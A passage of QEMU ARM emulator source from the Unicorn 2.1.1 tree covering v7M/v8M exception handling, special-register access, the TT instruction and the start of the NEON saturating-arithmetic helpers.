*/ switch (env->exception.fsr & 0xf) { case M_FAKE_FSR_NSC_EXEC: /* * Exception generated when we try to execute code at an address * which is marked as Secure & Non-Secure Callable and the CPU * is in the Non-Secure state. The only instruction which can * be executed like this is SG (and that only if both halves of * the SG instruction have the same security attributes.) * Everything else must generate an INVEP SecureFault, so we * emulate the SG instruction here. */ if (v7m_handle_execute_nsc(cpu)) { return; } break; case M_FAKE_FSR_SFAULT: /* * Various flavours of SecureFault for attempts to execute or * access data in the wrong security state. */ switch (cs->exception_index) { case EXCP_PREFETCH_ABORT: if (env->v7m.secure) { env->v7m.sfsr |= R_V7M_SFSR_INVTRAN_MASK; qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.INVTRAN\n"); } else { env->v7m.sfsr |= R_V7M_SFSR_INVEP_MASK; qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.INVEP\n"); } break; case EXCP_DATA_ABORT: /* This must be an NS access to S memory */ env->v7m.sfsr |= R_V7M_SFSR_AUVIOL_MASK; qemu_log_mask(CPU_LOG_INT, "...really SecureFault with SFSR.AUVIOL\n"); break; } armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_SECURE, false); break; case 0x8: /* External Abort */ switch (cs->exception_index) { case EXCP_PREFETCH_ABORT: env->v7m.cfsr[M_REG_NS] |= R_V7M_CFSR_IBUSERR_MASK; qemu_log_mask(CPU_LOG_INT, "...with CFSR.IBUSERR\n"); break; case EXCP_DATA_ABORT: env->v7m.cfsr[M_REG_NS] |= (R_V7M_CFSR_PRECISERR_MASK | R_V7M_CFSR_BFARVALID_MASK); env->v7m.bfar = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with CFSR.PRECISERR and BFAR 0x%x\n", env->v7m.bfar); break; } armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_BUS, false); break; default: /* * All other FSR values are either MPU faults or "can't happen * for M profile" cases. */ switch (cs->exception_index) { case EXCP_PREFETCH_ABORT: env->v7m.cfsr[env->v7m.secure] |= R_V7M_CFSR_IACCVIOL_MASK; qemu_log_mask(CPU_LOG_INT, "...with CFSR.IACCVIOL\n"); break; case EXCP_DATA_ABORT: env->v7m.cfsr[env->v7m.secure] |= (R_V7M_CFSR_DACCVIOL_MASK | R_V7M_CFSR_MMARVALID_MASK); env->v7m.mmfar[env->v7m.secure] = env->exception.vaddress; qemu_log_mask(CPU_LOG_INT, "...with CFSR.DACCVIOL and MMFAR 0x%x\n", env->v7m.mmfar[env->v7m.secure]); break; } armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_MEM, env->v7m.secure); break; } break; case EXCP_SEMIHOST: qemu_log_mask(CPU_LOG_INT, "...handling as semihosting call 0x%x\n", env->regs[0]); // env->regs[0] = do_arm_semihosting(env); FIXME env->regs[15] += env->thumb ? 2 : 4; return; case EXCP_BKPT: armv7m_nvic_set_pending(env->nvic, ARMV7M_EXCP_DEBUG, false); break; case EXCP_IRQ: break; case EXCP_EXCEPTION_EXIT: if (env->regs[15] < EXC_RETURN_MIN_MAGIC) { /* Must be v8M security extension function return */ assert(env->regs[15] >= FNC_RETURN_MIN_MAGIC); assert(arm_feature(env, ARM_FEATURE_M_SECURITY)); if (do_v7m_function_return(cpu)) { return; } } else { do_v7m_exception_exit(cpu); return; } break; case EXCP_LAZYFP: /* * We already pended the specific exception in the NVIC in the * v7m_preserve_fp_state() helper function. */ break; default: cpu_abort(cs, "Unhandled exception 0x%x\n", cs->exception_index); return; /* Never happens. Keep compiler happy. */ } if (arm_feature(env, ARM_FEATURE_V8)) { lr = R_V7M_EXCRET_RES1_MASK | R_V7M_EXCRET_DCRS_MASK; /* * The S bit indicates whether we should return to Secure * or NonSecure (ie our current state). 
         * The ES bit indicates whether we're taking this exception
         * to Secure or NonSecure (ie our target state). We set it
         * later, in v7m_exception_taken().
         * The SPSEL bit is also set in v7m_exception_taken() for v8M.
         * This corresponds to the ARM ARM pseudocode for v8M setting
         * some LR bits in PushStack() and some in ExceptionTaken();
         * the distinction matters for the tailchain cases where we
         * can take an exception without pushing the stack.
         */
        if (env->v7m.secure) {
            lr |= R_V7M_EXCRET_S_MASK;
        }
    } else {
        lr = R_V7M_EXCRET_RES1_MASK |
            R_V7M_EXCRET_S_MASK |
            R_V7M_EXCRET_DCRS_MASK |
            R_V7M_EXCRET_ES_MASK;
        if (env->v7m.control[M_REG_NS] & R_V7M_CONTROL_SPSEL_MASK) {
            lr |= R_V7M_EXCRET_SPSEL_MASK;
        }
    }
    if (!(env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK)) {
        lr |= R_V7M_EXCRET_FTYPE_MASK;
    }
    if (!arm_v7m_is_handler_mode(env)) {
        lr |= R_V7M_EXCRET_MODE_MASK;
    }

    ignore_stackfaults = v7m_push_stack(cpu);
    v7m_exception_taken(cpu, lr, false, ignore_stackfaults);
}

uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg)
{
    unsigned el = arm_current_el(env);

    /* First handle registers which unprivileged can read */
    if (reg >= 0 && reg <= 7) {
        return v7m_mrs_xpsr(env, reg, el);
    } else {
        switch (reg) {
        case 20: /* CONTROL */
            return v7m_mrs_control(env, env->v7m.secure);
        case 0x94: /* CONTROL_NS */
            /*
             * We have to handle this here because unprivileged Secure code
             * can read the NS CONTROL register.
             */
            if (!env->v7m.secure) {
                return 0;
            }
            return env->v7m.control[M_REG_NS] |
                (env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK);
        }
    }

    if (el == 0) {
        return 0; /* unprivileged reads others as zero */
    }

    if (arm_feature(env, ARM_FEATURE_M_SECURITY)) {
        switch (reg) {
        case 0x88: /* MSP_NS */
            if (!env->v7m.secure) {
                return 0;
            }
            return env->v7m.other_ss_msp;
        case 0x89: /* PSP_NS */
            if (!env->v7m.secure) {
                return 0;
            }
            return env->v7m.other_ss_psp;
        case 0x8a: /* MSPLIM_NS */
            if (!env->v7m.secure) {
                return 0;
            }
            return env->v7m.msplim[M_REG_NS];
        case 0x8b: /* PSPLIM_NS */
            if (!env->v7m.secure) {
                return 0;
            }
            return env->v7m.psplim[M_REG_NS];
        case 0x90: /* PRIMASK_NS */
            if (!env->v7m.secure) {
                return 0;
            }
            return env->v7m.primask[M_REG_NS];
        case 0x91: /* BASEPRI_NS */
            if (!env->v7m.secure) {
                return 0;
            }
            return env->v7m.basepri[M_REG_NS];
        case 0x93: /* FAULTMASK_NS */
            if (!env->v7m.secure) {
                return 0;
            }
            return env->v7m.faultmask[M_REG_NS];
        case 0x98: /* SP_NS */
        {
            /*
             * This gives the non-secure SP selected based on whether we're
             * currently in handler mode or not, using the NS CONTROL.SPSEL.
             */
            bool spsel = env->v7m.control[M_REG_NS] & R_V7M_CONTROL_SPSEL_MASK;

            if (!env->v7m.secure) {
                return 0;
            }
            if (!arm_v7m_is_handler_mode(env) && spsel) {
                return env->v7m.other_ss_psp;
            } else {
                return env->v7m.other_ss_msp;
            }
        }
        default:
            break;
        }
    }

    switch (reg) {
    case 8: /* MSP */
        return v7m_using_psp(env) ? env->v7m.other_sp : env->regs[13];
    case 9: /* PSP */
        return v7m_using_psp(env) ?
env->regs[13] : env->v7m.other_sp; case 10: /* MSPLIM */ if (!arm_feature(env, ARM_FEATURE_V8)) { goto bad_reg; } return env->v7m.msplim[env->v7m.secure]; case 11: /* PSPLIM */ if (!arm_feature(env, ARM_FEATURE_V8)) { goto bad_reg; } return env->v7m.psplim[env->v7m.secure]; case 16: /* PRIMASK */ return env->v7m.primask[env->v7m.secure]; case 17: /* BASEPRI */ case 18: /* BASEPRI_MAX */ return env->v7m.basepri[env->v7m.secure]; case 19: /* FAULTMASK */ return env->v7m.faultmask[env->v7m.secure]; default: bad_reg: qemu_log_mask(LOG_GUEST_ERROR, "Attempt to read unknown special" " register %d\n", reg); return 0; } } void HELPER(v7m_msr)(CPUARMState *env, uint32_t maskreg, uint32_t val) { /* * We're passed bits [11..0] of the instruction; extract * SYSm and the mask bits. * Invalid combinations of SYSm and mask are UNPREDICTABLE; * we choose to treat them as if the mask bits were valid. * NB that the pseudocode 'mask' variable is bits [11..10], * whereas ours is [11..8]. */ uint32_t mask = extract32(maskreg, 8, 4); uint32_t reg = extract32(maskreg, 0, 8); int cur_el = arm_current_el(env); if (cur_el == 0 && reg > 7 && reg != 20) { /* * only xPSR sub-fields and CONTROL.SFPA may be written by * unprivileged code */ return; } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { switch (reg) { case 0x88: /* MSP_NS */ if (!env->v7m.secure) { return; } env->v7m.other_ss_msp = val; return; case 0x89: /* PSP_NS */ if (!env->v7m.secure) { return; } env->v7m.other_ss_psp = val; return; case 0x8a: /* MSPLIM_NS */ if (!env->v7m.secure) { return; } env->v7m.msplim[M_REG_NS] = val & ~7; return; case 0x8b: /* PSPLIM_NS */ if (!env->v7m.secure) { return; } env->v7m.psplim[M_REG_NS] = val & ~7; return; case 0x90: /* PRIMASK_NS */ if (!env->v7m.secure) { return; } env->v7m.primask[M_REG_NS] = val & 1; return; case 0x91: /* BASEPRI_NS */ if (!env->v7m.secure || !arm_feature(env, ARM_FEATURE_M_MAIN)) { return; } env->v7m.basepri[M_REG_NS] = val & 0xff; return; case 0x93: /* FAULTMASK_NS */ if (!env->v7m.secure || !arm_feature(env, ARM_FEATURE_M_MAIN)) { return; } env->v7m.faultmask[M_REG_NS] = val & 1; return; case 0x94: /* CONTROL_NS */ if (!env->v7m.secure) { return; } write_v7m_control_spsel_for_secstate(env, val & R_V7M_CONTROL_SPSEL_MASK, M_REG_NS); if (arm_feature(env, ARM_FEATURE_M_MAIN)) { env->v7m.control[M_REG_NS] &= ~R_V7M_CONTROL_NPRIV_MASK; env->v7m.control[M_REG_NS] |= val & R_V7M_CONTROL_NPRIV_MASK; } /* * SFPA is RAZ/WI from NS. FPCA is RO if NSACR.CP10 == 0, * RES0 if the FPU is not present, and is stored in the S bank */ if (cpu_isar_feature(aa32_vfp_simd, env_archcpu(env)) && extract32(env->v7m.nsacr, 10, 1)) { env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_FPCA_MASK; env->v7m.control[M_REG_S] |= val & R_V7M_CONTROL_FPCA_MASK; } return; case 0x98: /* SP_NS */ { /* * This gives the non-secure SP selected based on whether we're * currently in handler mode or not, using the NS CONTROL.SPSEL. */ bool spsel = env->v7m.control[M_REG_NS] & R_V7M_CONTROL_SPSEL_MASK; bool is_psp = !arm_v7m_is_handler_mode(env) && spsel; uint32_t limit; if (!env->v7m.secure) { return; } limit = is_psp ? 
env->v7m.psplim[false] : env->v7m.msplim[false]; if (val < limit) { CPUState *cs = env_cpu(env); cpu_restore_state(cs, GETPC(), true); raise_exception(env, EXCP_STKOF, 0, 1); } if (is_psp) { env->v7m.other_ss_psp = val; } else { env->v7m.other_ss_msp = val; } return; } default: break; } } if (reg >= 0 && reg <= 7) { v7m_msr_xpsr(env, mask, reg, val); } else { switch (reg) { case 8: /* MSP */ if (v7m_using_psp(env)) { env->v7m.other_sp = val; } else { env->regs[13] = val; } break; case 9: /* PSP */ if (v7m_using_psp(env)) { env->regs[13] = val; } else { env->v7m.other_sp = val; } break; case 10: /* MSPLIM */ if (!arm_feature(env, ARM_FEATURE_V8)) { goto bad_reg; } env->v7m.msplim[env->v7m.secure] = val & ~7; break; case 11: /* PSPLIM */ if (!arm_feature(env, ARM_FEATURE_V8)) { goto bad_reg; } env->v7m.psplim[env->v7m.secure] = val & ~7; break; case 16: /* PRIMASK */ env->v7m.primask[env->v7m.secure] = val & 1; break; case 17: /* BASEPRI */ if (!arm_feature(env, ARM_FEATURE_M_MAIN)) { goto bad_reg; } env->v7m.basepri[env->v7m.secure] = val & 0xff; break; case 18: /* BASEPRI_MAX */ if (!arm_feature(env, ARM_FEATURE_M_MAIN)) { goto bad_reg; } val &= 0xff; if (val != 0 && (val < env->v7m.basepri[env->v7m.secure] || env->v7m.basepri[env->v7m.secure] == 0)) { env->v7m.basepri[env->v7m.secure] = val; } break; case 19: /* FAULTMASK */ if (!arm_feature(env, ARM_FEATURE_M_MAIN)) { goto bad_reg; } env->v7m.faultmask[env->v7m.secure] = val & 1; break; case 20: /* CONTROL */ /* * Writing to the SPSEL bit only has an effect if we are in * thread mode; other bits can be updated by any privileged code. * write_v7m_control_spsel() deals with updating the SPSEL bit in * env->v7m.control, so we only need update the others. * For v7M, we must just ignore explicit writes to SPSEL in handler * mode; for v8M the write is permitted but will have no effect. * All these bits are writes-ignored from non-privileged code, * except for SFPA. */ if (cur_el > 0 && (arm_feature(env, ARM_FEATURE_V8) || !arm_v7m_is_handler_mode(env))) { write_v7m_control_spsel(env, (val & R_V7M_CONTROL_SPSEL_MASK) != 0); } if (cur_el > 0 && arm_feature(env, ARM_FEATURE_M_MAIN)) { env->v7m.control[env->v7m.secure] &= ~R_V7M_CONTROL_NPRIV_MASK; env->v7m.control[env->v7m.secure] |= val & R_V7M_CONTROL_NPRIV_MASK; } if (cpu_isar_feature(aa32_vfp_simd, env_archcpu(env))) { /* * SFPA is RAZ/WI from NS or if no FPU. * FPCA is RO if NSACR.CP10 == 0, RES0 if the FPU is not present. * Both are stored in the S bank. */ if (env->v7m.secure) { env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_SFPA_MASK; env->v7m.control[M_REG_S] |= val & R_V7M_CONTROL_SFPA_MASK; } if (cur_el > 0 && (env->v7m.secure || !arm_feature(env, ARM_FEATURE_M_SECURITY) || extract32(env->v7m.nsacr, 10, 1))) { env->v7m.control[M_REG_S] &= ~R_V7M_CONTROL_FPCA_MASK; env->v7m.control[M_REG_S] |= val & R_V7M_CONTROL_FPCA_MASK; } } break; default: bad_reg: qemu_log_mask(LOG_GUEST_ERROR, "Attempt to write unknown special" " register %d\n", reg); return; } } } uint32_t HELPER(v7m_tt)(CPUARMState *env, uint32_t addr, uint32_t op) { /* Implement the TT instruction. op is bits [7:6] of the insn. */ bool forceunpriv = op & 1; bool alt = op & 2; V8M_SAttributes sattrs = { 0 }; uint32_t tt_resp; bool r, rw, nsr, nsrw, mrvalid; int prot; ARMMMUFaultInfo fi = { 0 }; MemTxAttrs attrs = { 0 }; hwaddr phys_addr; ARMMMUIdx mmu_idx; uint32_t mregion; bool targetpriv; bool targetsec = env->v7m.secure; bool is_subpage; /* * Work out what the security state and privilege level we're * interested in is... 
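     *
     * (The TT response word built at the end of this function packs:
     * MREGION in bits [7:0], SREGION in [15:8], MRVALID bit 16,
     * SRVALID bit 17, R bit 18, RW bit 19, NSR bit 20, NSRW bit 21,
     * S bit 22, IRVALID bit 23 and IREGION in [31:24].)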
     */
    if (alt) {
        targetsec = !targetsec;
    }

    if (forceunpriv) {
        targetpriv = false;
    } else {
        targetpriv = arm_v7m_is_handler_mode(env) ||
            !(env->v7m.control[targetsec] & R_V7M_CONTROL_NPRIV_MASK);
    }

    /* ...and then figure out which MMU index this is */
    mmu_idx = arm_v7m_mmu_idx_for_secstate_and_priv(env, targetsec, targetpriv);

    /*
     * We know that the MPU and SAU don't care about the access type
     * for our purposes beyond that we don't want to claim to be
     * an insn fetch, so we arbitrarily call this a read.
     */

    /*
     * MPU region info only available for privileged or if
     * inspecting the other MPU state.
     */
    if (arm_current_el(env) != 0 || alt) {
        /* We can ignore the return value as prot is always set */
        pmsav8_mpu_lookup(env, addr, MMU_DATA_LOAD, mmu_idx,
                          &phys_addr, &attrs, &prot, &is_subpage,
                          &fi, &mregion);
        if (mregion == -1) {
            mrvalid = false;
            mregion = 0;
        } else {
            mrvalid = true;
        }
        r = prot & PAGE_READ;
        rw = prot & PAGE_WRITE;
    } else {
        r = false;
        rw = false;
        mrvalid = false;
        mregion = 0;
    }

    if (env->v7m.secure) {
        v8m_security_lookup(env, addr, MMU_DATA_LOAD, mmu_idx, &sattrs);
        nsr = sattrs.ns && r;
        nsrw = sattrs.ns && rw;
    } else {
        sattrs.ns = true;
        nsr = false;
        nsrw = false;
    }

    tt_resp = (sattrs.iregion << 24) |
        (sattrs.irvalid << 23) |
        ((!sattrs.ns) << 22) |
        (nsrw << 21) |
        (nsr << 20) |
        (rw << 19) |
        (r << 18) |
        (sattrs.srvalid << 17) |
        (mrvalid << 16) |
        (sattrs.sregion << 8) |
        mregion;

    return tt_resp;
}

ARMMMUIdx arm_v7m_mmu_idx_all(CPUARMState *env,
                              bool secstate, bool priv, bool negpri)
{
    ARMMMUIdx mmu_idx = ARM_MMU_IDX_M;

    if (priv) {
        mmu_idx |= ARM_MMU_IDX_M_PRIV;
    }

    if (negpri) {
        mmu_idx |= ARM_MMU_IDX_M_NEGPRI;
    }

    if (secstate) {
        mmu_idx |= ARM_MMU_IDX_M_S;
    }

    return mmu_idx;
}

ARMMMUIdx arm_v7m_mmu_idx_for_secstate_and_priv(CPUARMState *env,
                                                bool secstate, bool priv)
{
    bool negpri = armv7m_nvic_neg_prio_requested(env->nvic, secstate);

    return arm_v7m_mmu_idx_all(env, secstate, priv, negpri);
}

/* Return the MMU index for a v7M CPU in the specified security state */
ARMMMUIdx arm_v7m_mmu_idx_for_secstate(CPUARMState *env, bool secstate)
{
    bool priv = arm_current_el(env) != 0;

    return arm_v7m_mmu_idx_for_secstate_and_priv(env, secstate, priv);
}
unicorn-2.1.1/qemu/target/arm/neon_helper.c000066400000000000000000000154534146752410670020676 0ustar00rootroot00000000000000/*
 * ARM NEON vector operations.
 *
 * Copyright (c) 2007, 2008 CodeSourcery.
 * Written by Paul Brook
 *
 * This code is licensed under the GNU GPL v2.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define SIGNBIT (uint32_t)0x80000000 #define SIGNBIT64 ((uint64_t)1 << 63) #define SET_QC() env->vfp.qc[0] = 1 #define NEON_TYPE1(name, type) \ typedef struct \ { \ type v1; \ } neon_##name; #ifdef HOST_WORDS_BIGENDIAN #define NEON_TYPE2(name, type) \ typedef struct \ { \ type v2; \ type v1; \ } neon_##name; #define NEON_TYPE4(name, type) \ typedef struct \ { \ type v4; \ type v3; \ type v2; \ type v1; \ } neon_##name; #else #define NEON_TYPE2(name, type) \ typedef struct \ { \ type v1; \ type v2; \ } neon_##name; #define NEON_TYPE4(name, type) \ typedef struct \ { \ type v1; \ type v2; \ type v3; \ type v4; \ } neon_##name; #endif NEON_TYPE4(s8, int8_t) NEON_TYPE4(u8, uint8_t) NEON_TYPE2(s16, int16_t) NEON_TYPE2(u16, uint16_t) NEON_TYPE1(s32, int32_t) NEON_TYPE1(u32, uint32_t) #undef NEON_TYPE4 #undef NEON_TYPE2 #undef NEON_TYPE1 /* Copy from a uint32_t to a vector structure type. */ #define NEON_UNPACK(vtype, dest, val) do { \ union { \ vtype v; \ uint32_t i; \ } conv_u; \ conv_u.i = (val); \ dest = conv_u.v; \ } while(0) /* Copy from a vector structure type to a uint32_t. */ #define NEON_PACK(vtype, dest, val) do { \ union { \ vtype v; \ uint32_t i; \ } conv_u; \ conv_u.v = (val); \ dest = conv_u.i; \ } while(0) #define NEON_DO1 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); #define NEON_DO2 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); \ NEON_FN(vdest.v2, vsrc1.v2, vsrc2.v2); #define NEON_DO4 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc2.v1); \ NEON_FN(vdest.v2, vsrc1.v2, vsrc2.v2); \ NEON_FN(vdest.v3, vsrc1.v3, vsrc2.v3); \ NEON_FN(vdest.v4, vsrc1.v4, vsrc2.v4); #define NEON_VOP_BODY(vtype, n) \ { \ uint32_t res; \ vtype vsrc1; \ vtype vsrc2; \ vtype vdest; \ NEON_UNPACK(vtype, vsrc1, arg1); \ NEON_UNPACK(vtype, vsrc2, arg2); \ NEON_DO##n; \ NEON_PACK(vtype, res, vdest); \ return res; \ } #define NEON_VOP(name, vtype, n) \ uint32_t HELPER(glue(neon_,name))(uint32_t arg1, uint32_t arg2) \ NEON_VOP_BODY(vtype, n) #define NEON_VOP_ENV(name, vtype, n) \ uint32_t HELPER(glue(neon_,name))(CPUARMState *env, uint32_t arg1, uint32_t arg2) \ NEON_VOP_BODY(vtype, n) /* Pairwise operations. */ /* For 32-bit elements each segment only contains a single element, so the elementwise and pairwise operations are the same. */ #define NEON_PDO2 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc1.v2); \ NEON_FN(vdest.v2, vsrc2.v1, vsrc2.v2); #define NEON_PDO4 \ NEON_FN(vdest.v1, vsrc1.v1, vsrc1.v2); \ NEON_FN(vdest.v2, vsrc1.v3, vsrc1.v4); \ NEON_FN(vdest.v3, vsrc2.v1, vsrc2.v2); \ NEON_FN(vdest.v4, vsrc2.v3, vsrc2.v4); \ #define NEON_POP(name, vtype, n) \ uint32_t HELPER(glue(neon_,name))(uint32_t arg1, uint32_t arg2) \ { \ uint32_t res; \ vtype vsrc1; \ vtype vsrc2; \ vtype vdest; \ NEON_UNPACK(vtype, vsrc1, arg1); \ NEON_UNPACK(vtype, vsrc2, arg2); \ NEON_PDO##n; \ NEON_PACK(vtype, res, vdest); \ return res; \ } /* Unary operators. 
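 * These reuse the NEON_DO##n lane expansion above, so a NEON_FN used
 * with NEON_VOP1 must simply ignore its third argument; since unused
 * macro parameters are dropped during expansion, the vsrc2 lane
 * reference never appears in the expanded helper body.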
*/ #define NEON_VOP1(name, vtype, n) \ uint32_t HELPER(glue(neon_,name))(uint32_t arg) \ { \ vtype vsrc1; \ vtype vdest; \ NEON_UNPACK(vtype, vsrc1, arg); \ NEON_DO##n; \ NEON_PACK(vtype, arg, vdest); \ return arg; \ } #define NEON_USAT(dest, src1, src2, type) do { \ uint32_t tmp = (uint32_t)src1 + (uint32_t)src2; \ if (tmp != (type)tmp) { \ SET_QC(); \ dest = ~0; \ } else { \ dest = tmp; \ }} while(0) #define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint8_t) NEON_VOP_ENV(qadd_u8, neon_u8, 4) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint16_t) NEON_VOP_ENV(qadd_u16, neon_u16, 2) #undef NEON_FN #undef NEON_USAT uint32_t HELPER(neon_qadd_u32)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (res < a) { SET_QC(); res = ~0; } return res; } uint64_t HELPER(neon_qadd_u64)(CPUARMState *env, uint64_t src1, uint64_t src2) { uint64_t res; res = src1 + src2; if (res < src1) { SET_QC(); res = ~(uint64_t)0; } return res; } #define NEON_SSAT(dest, src1, src2, type) do { \ int32_t tmp = (uint32_t)src1 + (uint32_t)src2; \ if (tmp != (type)tmp) { \ SET_QC(); \ if (src2 > 0) { \ tmp = (1 << (sizeof(type) * 8 - 1)) - 1; \ } else { \ tmp = 1 << (sizeof(type) * 8 - 1); \ } \ } \ dest = tmp; \ } while(0) #define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int8_t) NEON_VOP_ENV(qadd_s8, neon_s8, 4) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int16_t) NEON_VOP_ENV(qadd_s16, neon_s16, 2) #undef NEON_FN #undef NEON_SSAT uint32_t HELPER(neon_qadd_s32)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) { SET_QC(); res = ~(((int32_t)a >> 31) ^ SIGNBIT); } return res; } uint64_t HELPER(neon_qadd_s64)(CPUARMState *env, uint64_t src1, uint64_t src2) { uint64_t res; res = src1 + src2; if (((res ^ src1) & SIGNBIT64) && !((src1 ^ src2) & SIGNBIT64)) { SET_QC(); res = ((int64_t)src1 >> 63) ^ ~SIGNBIT64; } return res; } /* Unsigned saturating accumulate of signed value * * Op1/Rn is treated as signed * Op2/Rd is treated as unsigned * * Explicit casting is used to ensure the correct sign extension of * inputs. The result is treated as a unsigned value and saturated as such. * * We use a macro for the 8/16 bit cases which expects signed integers of va, * vb, and vr for interim calculation and an unsigned 32 bit result value r. 
*/ #define USATACC(bits, shift) \ do { \ va = sextract32(a, shift, bits); \ vb = extract32(b, shift, bits); \ vr = va + vb; \ if (vr > UINT##bits##_MAX) { \ SET_QC(); \ vr = UINT##bits##_MAX; \ } else if (vr < 0) { \ SET_QC(); \ vr = 0; \ } \ r = deposit32(r, shift, bits, vr); \ } while (0) uint32_t HELPER(neon_uqadd_s8)(CPUARMState *env, uint32_t a, uint32_t b) { int16_t va, vb, vr; uint32_t r = 0; USATACC(8, 0); USATACC(8, 8); USATACC(8, 16); USATACC(8, 24); return r; } uint32_t HELPER(neon_uqadd_s16)(CPUARMState *env, uint32_t a, uint32_t b) { int32_t va, vb, vr; uint64_t r = 0; USATACC(16, 0); USATACC(16, 16); return r; } #undef USATACC uint32_t HELPER(neon_uqadd_s32)(CPUARMState *env, uint32_t a, uint32_t b) { int64_t va = (int32_t)a; int64_t vb = (uint32_t)b; int64_t vr = va + vb; if (vr > UINT32_MAX) { SET_QC(); vr = UINT32_MAX; } else if (vr < 0) { SET_QC(); vr = 0; } return vr; } uint64_t HELPER(neon_uqadd_s64)(CPUARMState *env, uint64_t a, uint64_t b) { uint64_t res; res = a + b; /* We only need to look at the pattern of SIGN bits to detect * +ve/-ve saturation */ if (~a & b & ~res & SIGNBIT64) { SET_QC(); res = UINT64_MAX; } else if (a & ~b & res & SIGNBIT64) { SET_QC(); res = 0; } return res; } /* Signed saturating accumulate of unsigned value * * Op1/Rn is treated as unsigned * Op2/Rd is treated as signed * * The result is treated as a signed value and saturated as such * * We use a macro for the 8/16 bit cases which expects signed integers of va, * vb, and vr for interim calculation and an unsigned 32 bit result value r. */ #define SSATACC(bits, shift) \ do { \ va = extract32(a, shift, bits); \ vb = sextract32(b, shift, bits); \ vr = va + vb; \ if (vr > INT##bits##_MAX) { \ SET_QC(); \ vr = INT##bits##_MAX; \ } else if (vr < INT##bits##_MIN) { \ SET_QC(); \ vr = INT##bits##_MIN; \ } \ r = deposit32(r, shift, bits, vr); \ } while (0) uint32_t HELPER(neon_sqadd_u8)(CPUARMState *env, uint32_t a, uint32_t b) { int16_t va, vb, vr; uint32_t r = 0; SSATACC(8, 0); SSATACC(8, 8); SSATACC(8, 16); SSATACC(8, 24); return r; } uint32_t HELPER(neon_sqadd_u16)(CPUARMState *env, uint32_t a, uint32_t b) { int32_t va, vb, vr; uint32_t r = 0; SSATACC(16, 0); SSATACC(16, 16); return r; } #undef SSATACC uint32_t HELPER(neon_sqadd_u32)(CPUARMState *env, uint32_t a, uint32_t b) { int64_t res; int64_t op1 = (uint32_t)a; int64_t op2 = (int32_t)b; res = op1 + op2; if (res > INT32_MAX) { SET_QC(); res = INT32_MAX; } else if (res < INT32_MIN) { SET_QC(); res = INT32_MIN; } return res; } uint64_t HELPER(neon_sqadd_u64)(CPUARMState *env, uint64_t a, uint64_t b) { uint64_t res; res = a + b; /* We only need to look at the pattern of SIGN bits to detect an overflow */ if (((a & res) | (~b & res) | (a & ~b)) & SIGNBIT64) { SET_QC(); res = INT64_MAX; } return res; } #define NEON_USAT(dest, src1, src2, type) do { \ uint32_t tmp = (uint32_t)src1 - (uint32_t)src2; \ if (tmp != (type)tmp) { \ SET_QC(); \ dest = 0; \ } else { \ dest = tmp; \ }} while(0) #define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint8_t) NEON_VOP_ENV(qsub_u8, neon_u8, 4) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint16_t) NEON_VOP_ENV(qsub_u16, neon_u16, 2) #undef NEON_FN #undef NEON_USAT uint32_t HELPER(neon_qsub_u32)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a - b; if (res > a) { SET_QC(); res = 0; } return res; } uint64_t HELPER(neon_qsub_u64)(CPUARMState *env, uint64_t src1, uint64_t src2) { uint64_t res; if (src1 < src2) { SET_QC(); res = 0; } else { res = src1 - src2; } 
return res; } #define NEON_SSAT(dest, src1, src2, type) do { \ int32_t tmp = (uint32_t)src1 - (uint32_t)src2; \ if (tmp != (type)tmp) { \ SET_QC(); \ if (src2 < 0) { \ tmp = (1 << (sizeof(type) * 8 - 1)) - 1; \ } else { \ tmp = 1 << (sizeof(type) * 8 - 1); \ } \ } \ dest = tmp; \ } while(0) #define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int8_t) NEON_VOP_ENV(qsub_s8, neon_s8, 4) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int16_t) NEON_VOP_ENV(qsub_s16, neon_s16, 2) #undef NEON_FN #undef NEON_SSAT uint32_t HELPER(neon_qsub_s32)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a - b; if (((res ^ a) & SIGNBIT) && ((a ^ b) & SIGNBIT)) { SET_QC(); res = ~(((int32_t)a >> 31) ^ SIGNBIT); } return res; } uint64_t HELPER(neon_qsub_s64)(CPUARMState *env, uint64_t src1, uint64_t src2) { uint64_t res; res = src1 - src2; if (((res ^ src1) & SIGNBIT64) && ((src1 ^ src2) & SIGNBIT64)) { SET_QC(); res = ((int64_t)src1 >> 63) ^ ~SIGNBIT64; } return res; } #define NEON_FN(dest, src1, src2) dest = (src1 + src2) >> 1 NEON_VOP(hadd_s8, neon_s8, 4) NEON_VOP(hadd_u8, neon_u8, 4) NEON_VOP(hadd_s16, neon_s16, 2) NEON_VOP(hadd_u16, neon_u16, 2) #undef NEON_FN int32_t HELPER(neon_hadd_s32)(int32_t src1, int32_t src2) { int32_t dest; dest = (src1 >> 1) + (src2 >> 1); if (src1 & src2 & 1) dest++; return dest; } uint32_t HELPER(neon_hadd_u32)(uint32_t 